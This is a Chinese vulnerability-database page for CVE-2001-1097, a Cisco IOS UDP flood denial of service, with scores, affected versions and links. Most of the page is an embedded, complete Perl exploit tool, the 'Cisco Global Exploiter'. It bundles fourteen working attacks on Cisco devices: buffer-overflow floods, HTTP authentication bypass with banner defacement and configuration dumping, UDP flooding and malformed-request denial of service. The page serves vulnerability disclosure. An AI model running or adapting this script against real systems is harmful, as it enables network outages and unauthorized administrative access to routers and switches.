CVE-2001-1097
CVSS5.0
发布时间 :2001-07-24 00:00:00
修订时间 :2016-10-17 22:14:10
NMCOES    

[原文]Cisco routers and switches running IOS 12.0 through 12.2.1 allows a remote attacker to cause a denial of service via a flood of UDP packets.


[CNNVD]Cisco IOS UDP 拒绝服务攻击漏洞(CNNVD-200107-173)

        CVE(CAN) ID: CAN-2001-1097
        
        
        
        发现Cisco IOS固件存在拒绝服务攻击漏洞。
        
        
        
        通过向运行IOS的设备发送大量的UDP数据包,可能导致系统耗尽所有的CPU资源而停止
        
        响应,只有通过重新启动才能恢复运行。
        
        
        
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/o:cisco:ios:12.0%286%29Cisco IOS 12.0.6
cpe:/o:cisco:ios:12.0%285%29Cisco IOS 12.0.5
cpe:/o:cisco:ios:12.0Cisco IOS 12.0
cpe:/o:cisco:ios:12.0%284%29Cisco IOS 12.0.4
cpe:/o:cisco:ios:12.0%287%29tCisco IOS 12.0(7)T
cpe:/o:cisco:ios:12.0%283%29Cisco IOS 12.0.3
cpe:/o:cisco:ios:12.0%282%29Cisco IOS 12.0.2
cpe:/o:cisco:ios:12.0%281%29Cisco IOS 12.0.1
cpe:/o:cisco:ios:12.2Cisco IOS 12.2
cpe:/o:cisco:ios:12.1Cisco IOS 12.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1097
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1097
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200107-173
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=99749327219189&w=2
(UNKNOWN)  BUGTRAQ  20010811 Re: UDP packet handling weird behaviour of various operating systems
http://www.securityfocus.com/archive/1/199558
(VENDOR_ADVISORY)  BUGTRAQ  20010724 UDP packet handling weird behaviour of various operating systems
http://www.securityfocus.com/bid/3096
(VENDOR_ADVISORY)  BID  3096
http://xforce.iss.net/static/6913.php
(VENDOR_ADVISORY)  XF  cisco-ios-udp-dos(6319)

- 漏洞信息

Cisco IOS UDP 拒绝服务攻击漏洞
中危 其他
2001-07-24 00:00:00 2005-10-20 00:00:00
远程  
        CVE(CAN) ID: CAN-2001-1097
        
        
        
        发现Cisco IOS固件存在拒绝服务攻击漏洞。
        
        
        
        通过向运行IOS的设备发送大量的UDP数据包,可能导致系统耗尽所有的CPU资源而停止
        
        响应,只有通过重新启动才能恢复运行。
        
        
        
        

- 公告与补丁

        
        
        厂商补丁:
        
        
        
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商
        
        的主页以获取最新版本:
        
        
        http://www.cisco.com/warp/public/732/jump.shtml

        

- 漏洞信息 (21028)

Cisco IOS 12 UDP Denial of Service Vulnerability (EDBID:21028)
hardware dos
2001-07-25 Verified
0 blackangels
N/A [点击下载]
source: http://www.securityfocus.com/bid/3096/info

A potential denial of service condition may exist in Cisco's IOS firmware.

The problem reportedly occurs when a large number of UDP packets are sent to device running IOS. This causes the system to use all available CPU resources and thus become unresponsive. The device may have to be reset manually if the attack is successful.


#!/usr/bin/perl

##
# Cisco Global Exploiter
#
# Legal notes :
# The BlackAngels staff refuse all responsabilities
# for an incorrect or illegal use of this software
# or for eventual damages to others systems.
#
# http://www.blackangels.it
##



##
# Modules
##

use Socket;
use IO::Socket;


##
# Main
##

$host = "";
$expvuln = "";
$host = @ARGV[ 0 ];
$expvuln = @ARGV[ 1 ];

if ($host eq "") {
usage();
}
if ($expvuln eq "") {
usage();
}
if ($expvuln eq "1") {
cisco1();
}
elsif ($expvuln eq "2") {
cisco2();
}
elsif ($expvuln eq "3") {
cisco3();
}
elsif ($expvuln eq "4") {
cisco4();
}
elsif ($expvuln eq "5") {
cisco5();
}
elsif ($expvuln eq "6") {
cisco6();
}
elsif ($expvuln eq "7") {
cisco7();
}
elsif ($expvuln eq "8") {
cisco8();
}
elsif ($expvuln eq "9") {
cisco9();
}
elsif ($expvuln eq "10") {
cisco10();
}
elsif ($expvuln eq "11") {
cisco11();
}
elsif ($expvuln eq "12") {
cisco12();
}
elsif ($expvuln eq "13") {
cisco13();
}
elsif ($expvuln eq "14") {
cisco14();
}
else {
printf "\nInvalid vulnerability number ...\n\n";
exit(1);
}


##
# Functions
##

sub usage
{
  printf "\nUsage :\n";
  printf "perl cge.pl <target> <vulnerability number>\n\n";
  printf "Vulnerabilities list :\n";
  printf "[1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability\n";
  printf "[2] - Cisco IOS Router Denial of Service Vulnerability\n";
  printf "[3] - Cisco IOS HTTP Auth Vulnerability\n";
  printf "[4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability\n";
  printf "[5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability\n";
  printf "[6] - Cisco 675 Web Administration Denial of Service Vulnerability\n";
  printf "[7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability\n";
  printf "[8] - Cisco IOS Software HTTP Request Denial of Service Vulnerability\n";
  printf "[9] - Cisco 514 UDP Flood Denial of Service Vulnerability\n";
  printf "[10] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability\n";
  printf "[11] - Cisco Catalyst Memory Leak Vulnerability\n";
  printf "[12] - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability\n";
  printf "[13] - %u Encoding IDS Bypass Vulnerability (UTF)\n";
  printf "[14] - Cisco IOS HTTP Denial of Service Vulnerability\n";
  exit(1);
}

sub cisco1 # Cisco 677/678 Telnet Buffer Overflow Vulnerability
{
  my $serv = $host;
  my $dch = "?????????????????a~ %%%%%XX%%%%%";
  my $num = 30000;
  my $string .= $dch x $num;
  my $shc="\015\012";

  my $sockd = IO::Socket::INET->new (
                                     Proto => "tcp",
                                     PeerAddr => $serv,
                                     PeerPort => "(23)",
                                     ) || die("No telnet server detected on $serv ...\n\n");

  $sockd->autoflush(1);
  print $sockd "$string". $shc;
  while (<$sockd>){ print }
  print("\nPacket sent ...\n");
  sleep(1);
  print("Now checking server's status ...\n");
  sleep(2);

  my $sockd2 = IO::Socket::INET->new (
                                      Proto => "tcp",
                                      PeerAddr => $serv,
                                      PeerPort => "(23)",
                                      ) || die("Vulnerability successful exploited. Target server is down ...\n\n");

  print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n");
  close($sockd2);
  exit(1);
}

sub cisco2 # Cisco IOS Router Denial of Service Vulnerability
{
  my $serv = $host;

  my $sockd = IO::Socket::INET->new (
                                     Proto=>"tcp",
                                     PeerAddr=>$serv,
                                     PeerPort=>"http(80)",);
                                     unless ($sockd){die "No http server detected on $serv ...\n\n"};
  $sockd->autoflush(1);
  print $sockd "GET /\%\% HTTP/1.0\n\n";
  -close $sockd;
  print "Packet sent ...\n";
  sleep(1);
  print("Now checking server's status ...\n");
  sleep(2);

  my $sockd2 = IO::Socket::INET->new (
                                      Proto=>"tcp",
                                      PeerAddr=>$serv,
                                      PeerPort=>"http(80)",);
                                      unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"};

  print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n");
  close($sockd2);
  exit(1);
}

sub cisco3 # Cisco IOS HTTP Auth Vulnerability
{
  my $serv= $host;
  my $n=16;
  my $port=80;
  my $target = inet_aton($serv);
  my $fg = 0;

  LAB: while ($n<100) {
  my @results=exploit("GET /level/".$n."/exec/- HTTP/1.0\r\n\r\n");
  $n++;
  foreach $line (@results){
          $line=~ tr/A-Z/a-z/;
          if ($line =~ /http\/1\.0 401 unauthorized/) {$fg=1;}
          if ($line =~ /http\/1\.0 200 ok/) {$fg=0;}
  }

  if ($fg==1) {
               sleep(2);
               print "Vulnerability unsuccessful exploited ...\n\n";
              }
  else {
        sleep(2);
        print "\nVulnerability successful exploited with [http://$serv/level/$n/exec/....] ...\n\n";
        last LAB;
       }

  sub exploit {
               my ($pstr)=@_;
               socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
               die("Unable to initialize socket ...\n\n");
               if(connect(S,pack "SnA4x8",2,$port,$target)){
                                                            my @in;
                                                            select(S);
                                                            $|=1;
                                                            print $pstr;
                                                            while(<S>){ push @in, $_;}
                                                            select(STDOUT); close(S); return @in;
                                                           }
  else { die("No http server detected on $serv ...\n\n"); }
  }
  }
  exit(1);
}

sub cisco4 # Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
{
  my $serv = $host;
  my $n = 16;

  while ($n <100) {
                   exploit1("GET /level/$n/exec/- HTTP/1.0\n\n");
                   $wr =~ s/\n//g;
                   if ($wr =~ /200 ok/) {
                                              while(1)
                                              { print "\nVulnerability could be successful exploited. Please choose a type of attack :\n";
                                                print "[1] Banner change\n";
                                                print "[2] List vty 0 4 acl info\n";
                                                print "[3] Other\n";
                                                print "Enter a valid option [ 1 - 2 - 3 ] : ";
                                                $vuln = <STDIN>;
                                                chomp($vuln);

                   if ($vuln == 1) {
                                    print "\nEnter deface line : ";
                                    $vuln = <STDIN>;
                                    chomp($vuln);
                                    exploit1("GET /level/$n/exec/-/configure/-/banner/motd/$vuln HTTP/1.0\n\n");
                                   }
                   elsif ($vuln == 2) {
                                       exploit1("GET /level/$n/exec/show%20conf HTTP/1.0\n\n");
                                       print "$wrf";
                                      }
                   elsif ($vuln == 3)
                                      { print "\nEnter attack URL : ";
                                        $vuln = <STDIN>;
                                        chomp($vuln);
                                        exploit1("GET /$vuln HTTP/1.0\n\n");
                                        print "$wrf";
                                      }
         }
         }
         $wr = "";
         $n++;
  }
  die "Vulnerability unsuccessful exploited ...\n\n";

  sub exploit1 {
                my $sockd = IO::Socket::INET -> new (
                                                     Proto => 'tcp',
                                                     PeerAddr => $serv,
                                                     PeerPort => 80,
                                                     Type => SOCK_STREAM,
                                                     Timeout => 5);
                                                     unless($sockd){die "No http server detected on $serv ...\n\n"}
  $sockd->autoflush(1);
  $sockd -> send($_[0]);
  while(<$sockd>){$wr .= $_} $wrf = $wr;
  close $sockd;
  }
  exit(1);
}

sub cisco5 # Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability
{
  my $serv = $host;
  my $port = 22;
  my $vuln = "a%a%a%a%a%a%a%";
 
  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => $port,
                                     Proto => "tcp")
                                     || die "No ssh server detected on $serv ...\n\n";

  print "Packet sent ...\n";
  print $sockd "$vuln";
  close($sockd);
  exit(1);
}

sub cisco6 # Cisco 675 Web Administration Denial of Service Vulnerability
{
  my $serv = $host;
  my $port = 80;
  my $vuln = "GET ? HTTP/1.0\n\n";
 
  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => $port,
                                     Proto => "tcp")
                                     || die "No http server detected on $serv ...\n\n";

  print "Packet sent ...\n";
  print $sockd "$vuln";
  sleep(2);
  print "\nServer response :\n\n";
  close($sockd);
  exit(1);
}

sub cisco7 # Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
{
  my $serv = $host;
  my $port = 80;
  my $k = "";
  
  print "Enter a file to read [ /show/config/cr set as default ] : ";
  $k = <STDIN>;
  chomp ($k);
  if ($k eq "")
  {$vuln = "GET /exec/show/config/cr HTTP/1.0\n\n";}
  else
  {$vuln = "GET /exec$k HTTP/1.0\n\n";}

  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => $port,
                                     Proto => "tcp")
                                     || die "No http server detected on $serv ...\n\n";

  print "Packet sent ...\n";
  print $sockd "$vuln";
  sleep(2);
  print "\nServer response :\n\n";
  while (<$sockd>){print}
  close($sockd);
  exit(1);
}

sub cisco8 # Cisco IOS Software HTTP Request Denial of Service Vulnerability
{
  my $serv = $host;
  my $port = 80;
  my $vuln = "GET /error?/ HTTP/1.0\n\n";

  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => $port,
                                     Proto => "tcp")
                                     || die "No http server detected on $serv ...\n\n";

  print "Packet sent ...\n";
  print $sockd "$vuln";
  sleep(2);
  print "\nServer response :\n\n";
  while (<$sockd>){print}
  close($sockd);
  exit(1);
}

sub cisco9 # Cisco 514 UDP Flood Denial of Service Vulnerability
{
  my $ip = $host;
  my $port = "514";
  my $ports = "";
  my $size = "";
  my $i = "";
  my $string = "%%%%%XX%%%%%";

  print "Input packets size : ";
  $size = <STDIN>;
  chomp($size);

  socket(SS, PF_INET, SOCK_DGRAM, 17);
  my $iaddr = inet_aton("$ip");

  for ($i=0; $i<10000; $i++)
  { send(SS, $string, $size, sockaddr_in($port, $iaddr)); }

  printf "\nPackets sent ...\n";
  sleep(2);
  printf "Please enter a server's open port : ";
  $ports = <STDIN>;
  chomp $ports;
  printf "\nNow checking server status ...\n";
  sleep(2);

  socket(SO, PF_INET, SOCK_STREAM, getprotobyname('tcp')) || die "An error occuring while loading socket ...\n\n";
  my $dest = sockaddr_in ($ports, inet_aton($ip));
  connect (SO, $dest) || die "Vulnerability successful exploited. Target server is down ...\n\n";

  printf "Vulnerability unsuccessful exploited. Target server is still up ...\n\n";
  exit(1);
}

sub cisco10 # CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability
{
  my $ip = $host;
  my $vln = "%%%%%XX%%%%%";
  my $num = 30000;
  my $string .= $vln x $num;
  my $shc="\015\012";

  my $sockd = IO::Socket::INET->new (
                                     Proto => "tcp",
                                     PeerAddr => $ip,
                                     PeerPort => "(2002)",
                                    ) || die "Unable to connect to $ip:2002 ...\n\n";

  $sockd->autoflush(1);
  print $sockd "$string" . $shc;
  while (<$sockd>){ print }
  print "Packet sent ...\n";
  close($sockd);
  sleep(1);
  print("Now checking server's status ...\n");
  sleep(2);

  my $sockd2 = IO::Socket::INET->new (
                                      Proto=>"tcp",
                                      PeerAddr=>$ip,
                                      PeerPort=>"(2002)",);
                                      unless ($sockd){die "Vulnerability successful exploited. Target server is down ...\n\n"};

  print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n");
  exit(1);
}

sub cisco11 # Cisco Catalyst Memory Leak Vulnerability
{
  my $serv = $host;
  my $rep = "";
  my $str = "AAA\n";

  print "\nInput the number of repetitions : ";
  $rep = <STDIN>;
  chomp $rep;
 
  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => "(23)",
                                     Proto => "tcp")
                                     || die "No telnet server detected on $serv ...\n\n";

  for ($k=0; $k<=$rep; $k++) {
                                print $sockd "$str";
                                sleep(1);
                                print $sockd "$str";
                                sleep(1);
                             }
  close($sockd);
  print "Packet sent ...\n";
  sleep(1);
  print("Now checking server's status ...\n");
  sleep(2);
  
  my $sockd2 = IO::Socket::INET->new (
                                      Proto=>"tcp",
                                      PeerAddr=>$serv,
                                      PeerPort=>"(23)",);
                                      unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"};

  print "Vulnerability unsuccessful exploited. Target server is still up after $rep logins ...\\n";
  close($sockd2);
  exit(1);
}

sub cisco12 # Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability
{
  my $serv = $host;
  my $l =100;
  my $vuln = "";
  my $long = "A" x $l;

  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => "(80)",
                                     Proto => "tcp")
                                     || die "No http server detected on $serv ...\n\n";

  for ($k=0; $k<=50; $k++) {
                              my $vuln = "GET " . $long . " HTTP/1.0\n\n";
                              print $sockd "$vuln\n\n";
                              sleep(1);
                              $l = $l + 100;
                           }

  close($sockd);
  print "Packet sent ...\n";
  sleep(1);
  print("Now checking server's status ...\n");
  sleep(2);

  my $sockd2 = IO::Socket::INET->new (
                                      Proto=>"tcp",
                                      PeerAddr=>$serv,
                                      PeerPort=>"http(80)",);
                                      unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"};

  print "Target is not vulnerable. Server is still up after 5 kb of buffer ...)\n";
  close($sockd2);
  exit(1);
}

sub cisco13 # %u Encoding IDS Bypass Vulnerability (UTF)
{
  my $serv = $host;
  my $vuln = "GET %u002F HTTP/1.0\n\n";

  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => "(80)",
                                     Proto => "tcp")
                                     || die "No http server detected on $serv ...\n\n";

  print "Packet sent ...\n";
  print $sockd "$vuln";
  close($sockd);
  sleep(1);
  print("Now checking server's status ...\n");
  print("Please verify if directory has been listed ...\n\n");
  print("Server response :\n");
  sleep(2);
  while (<$sockd>){ print }
  exit(1);
}

sub cisco14 # Cisco IOS HTTP server DoS Vulnerability
{
  my $serv = $host;
  my $vuln = "GET /TEST?/ HTTP/1.0";

  my $sockd = IO::Socket::INET->new (
                                     Proto=>"tcp",
                                     PeerAddr=>$serv,
                                     PeerPort=>"http(80)",);
                                     unless ($sockd){die "No http server detected on $serv ...\n\n"};

  print $sockd "$vuln\n\n";
  print "Packet sent ...\n";
  close($sockd);
  sleep(1);
  print("Now checking server's status ...\n");
  sleep(2);

  my $sockd2 = IO::Socket::INET->new (
                                      Proto=>"tcp",
                                      PeerAddr=>$serv,
                                      PeerPort=>"http(80)",);
                                      unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"};

  print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n");
  close($sockd2);
  exit(1);
}
		

- 漏洞信息

8826
Cisco IOS UDP Packet Flood Remote DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Unknown

- 漏洞描述

Cisco IOS contains a flaw that may allow a remote denial of service. The issue is triggered when a remote attacker sends a flood of UDP packets, which will consume all CPU resources and crash the the Cisco device, resulting in loss of availability.

- 时间线

2001-07-24 Unknow
2001-07-24 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Cisco IOS UDP Denial of Service Vulnerability
Failure to Handle Exceptional Conditions 3096
Yes No
2001-07-25 12:00:00 2009-07-11 06:56:00
Reported to Bugtraq by Stefan Laudat <stefan@mail.allianztiriac.ro> on July 25, 2001.

- 受影响的程序版本

Cisco IOS 12.0.7
Cisco IOS 12.0.6
Cisco IOS 12.0.5
Cisco IOS 12.0.4
Cisco IOS 12.0.3
Cisco IOS 12.0.2
Cisco IOS 12.0.1
Cisco IOS 12.2
Cisco IOS 12.1
Cisco IOS 12.0

- 漏洞讨论

A potential denial of service condition may exist in Cisco's IOS firmware.

The problem reportedly occurs when a large number of UDP packets are sent to device running IOS. This causes the system to use all available CPU resources and thus become unresponsive. The device may have to be reset manually if the attack is successful.

- 漏洞利用

The following proof of concept has been developed to trigger this vulnerability as well as other vulnerabilities in Cisco products:

- 解决方案

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站